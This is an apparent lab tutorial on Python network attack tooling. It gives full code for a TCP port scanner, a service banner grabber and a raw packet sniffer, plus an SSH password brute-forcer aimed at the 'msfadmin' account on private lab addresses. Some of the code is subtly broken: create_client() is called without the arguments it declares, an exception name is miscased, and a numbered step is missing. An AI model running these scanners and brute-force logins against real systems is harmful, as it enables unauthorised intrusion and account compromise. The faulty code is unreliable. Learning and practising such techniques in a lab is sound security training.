Open the socket package documentation to figure out the purpose of each function that is to be used.
1. Create a Socket connection
import socket
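def main():
    """Attempt one TCP connection to localhost:5000 and print the result code."""
    host = 'localhost'
    port = 5000  # connect_ex needs an int port; the string '5000' raises TypeError
    # The with-block closes the socket on exit, even if an exception is raised.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # connect_ex takes ONE (host, port) tuple and returns 0 on success or an
        # errno value instead of raising.
        result = s.connect_ex((host, port))
        print('Result is {}'.format(result))
        print('it works')


if __name__ == '__main__':
    main()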
2. Create a port scanner
import socket
from utils import timefunc
#Build a class so the same logic can be reused from several functions.
#In Python a function is itself an object, and a class describes how to build an object.
#Classes are useful because they encapsulate related data and behaviour.
#`self` refers to the current instance and gives access to its attributes and methods.
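class Scanner:
    """Sequential TCP connect scanner for a single host.

    Each port in the requested range is probed with a plain TCP connect;
    ports where the connection succeeds are collected in ``open_ports``.
    """

    def __init__(self, ip, timeout=None):
        """Remember the target; ``timeout`` (seconds) bounds each probe.

        The default ``None`` keeps the original blocking behaviour: a host
        that silently drops packets then holds every probe until the OS
        connect timeout expires, so a small value such as 1.0 is usually
        what callers want.
        """
        self.ip = ip  # target host name or address
        self.timeout = timeout
        self.open_ports = []  # ports found open by scan(), in scan order

    def __repr__(self):
        return 'Scanner: {}'.format(self.ip)

    def scan(self, lowerport, upperport):
        """Probe every port from lowerport to upperport inclusive."""
        for port in range(lowerport, upperport + 1):
            if self.is_open(port):
                self.add_port(port)

    def add_port(self, port):
        """Record *port* as open. scan() called this but it was never defined."""
        self.open_ports.append(port)

    def is_open(self, port):
        """Return True when a TCP connection to (ip, port) succeeds."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(self.timeout)
            # connect_ex takes ONE (host, port) tuple and returns 0 on success
            # or an errno value instead of raising.
            result = s.connect_ex((self.ip, port))
        return result == 0

    def write(self, filepath):
        """Write the open ports to *filepath*, one per line."""
        with open(filepath, 'w') as f:
            f.write('\n'.join(map(str, self.open_ports)))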
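@timefunc
def main():
    """Scan ports 1-100 on the hard-coded target and save the open ones to ./open_ports."""
    ip = '10.0.10.140'
    scanner = Scanner(ip)  # Scanner is constructed from the target IP alone
    scanner.scan(1, 100)  # the upper bound can be raised (e.g. 6000) at the cost of scan time
    scanner.write('./open_ports')


if __name__ == '__main__':
    main()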
4. Banner reading from open ports
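class Grabber:
    """Connect to one TCP port and read whatever the service sends first.

    Relies on ``socket`` being imported at module level (not shown in this
    excerpt).
    """

    def __init__(self, ip, port, timeout=1000):
        """Open the connection immediately; ``timeout`` is in seconds.

        The default of 1000 seconds is the original value: a service that
        never sends a banner will hold read() for that long, so callers
        usually pass something in the range of a few seconds.
        """
        self.ip = ip
        self.port = port
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.settimeout(timeout)
        # connect() takes ONE (host, port) tuple, not two positional arguments.
        self.socket.connect((self.ip, self.port))

    def read(self, length=1024):
        """Return up to *length* bytes sent by the remote service."""
        return self.socket.recv(length)

    def close(self):
        """Release the underlying socket."""
        self.socket.close()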
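def main():
    """Read and print the banner from port 22 on the hard-coded host."""
    grabber = Grabber('10.0.13.231', 22)
    print(grabber.read())
    grabber.close()


if __name__ == '__main__':  # the original used a single '=' here, which is a syntax error
    main()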
5. Combining the two previous classes
from utils import timefunc
from port_scanner import Scanner
from grabber import Grabber
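@timefunc
def main():
    """Scan ports 1-1001 on the target, then read a banner from each open port."""
    ip = '10.0.13.231'
    portrange = (1, 1001)  # the original spelled this name two different ways
    scanner = Scanner(ip)
    scanner.scan(*portrange)
    for port in scanner.open_ports:
        # One port failing to connect or answer must not abort the rest of the loop,
        # so each port is handled on its own.
        try:
            grabber = Grabber(ip, port)
        except Exception as e:
            print("Error", e)
            continue
        try:
            print(grabber.read())
        except Exception as e:
            print("Error", e)
        finally:
            # close even when read() fails; the original leaked the socket in that case
            grabber.close()


if __name__ == '__main__':
    main()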
6. Brute forcing an SSH connection
import itertools as it
import string
from utils import timefunc
import paramiko
def create_client(ip, username, password):
    """Build a paramiko SSHClient.

    Only the client object is created here: the ip/username/password
    arguments are accepted but not used in this body, and no connection is
    opened. AutoAddPolicy makes the client accept any host key it has not
    seen before, so it trusts whatever host answers at the address instead
    of verifying the server's identity.
    """
    client = paramiko.SSHClient()
    client_policy = paramiko.AutoAddPolicy()
    client.set_missing_host_key_policy(client_policy)
    return client
class Brutes:
    """Holds the target address and the parameters of the candidate-password space.

    Every candidate is tried as a separate SSH login, so on the server side
    each one is recorded as a failed authentication; that is what auth
    logging, account lockout and rate-limiting policies are built to catch.
    """

    def __init__(self, charset, length, ip):
        self.charset = charset  # characters the candidates are built from
        self.length = length  # exact length of every candidate
        self.ip = ip  # SSH server address

    @timefunc
    def crackit(self, username):
        """Try each candidate from ``guesses`` against ``username``.

        Returns the first candidate for which ``client.connect`` succeeds
        (after printing it), or ``None`` when the loop runs out. The
        ``finally`` closes the client after every attempt.
        """
        client = create_client()
        for guess in self.guesses:
            try:
                # note: timeout (seconds) bounds how long each attempt waits.
                client.connect(self.ip, username = username, password = guess, timeout = 0.5)
                print('the password is {}'.format(guess))
                return guess
            except paramiko.authenticationException as e:
                print('{} is not it'.format(guess))
            finally:
                client.close()

    @property
    def guesses(self):
        """Yield every string of ``length`` characters over ``charset``, in itertools.product order."""
        for guess in it.product(self.charset, repeat=self.length):
            yield ''.join(guess)
@timefunc
def main():
    """Run Brutes against the hard-coded target with charset 'aspeb' and length 4."""
    #charset = string.ascii_letters + string.digits
    #charset = string.ascii_lowercase
    charset = 'aspeb'#'pqrstuvwxyzabcdefghijklmno'
    ip = '10.1.13.231'
    brute = Brutes(charset, 4, ip)
    password = brute.crackit(username= 'msfadmin')
    if password:
        print('found {}'.format(password))


if __name__== '__main__':
    main()
7. Packet sniffing in python
Note: it is assumed that you are running with root user permissions.
import socket
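def main():
    """Print every raw frame seen on any interface until interrupted.

    AF_PACKET/SOCK_RAW sockets exist only on Linux and require CAP_NET_RAW
    (in practice, root). Protocol 3 is ETH_P_ALL; it is passed through
    ntohs() because the kernel expects it in network byte order.
    """
    # The with-block closes the raw socket if recvfrom raises or the loop is
    # interrupted with Ctrl-C, instead of leaking it.
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) as conn:
        while True:
            raw_data, _addr = conn.recvfrom(65500)
            print(raw_data)


if __name__ == '__main__':
    main()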
Note: ping a website address to see the returned packets appear on the screen.
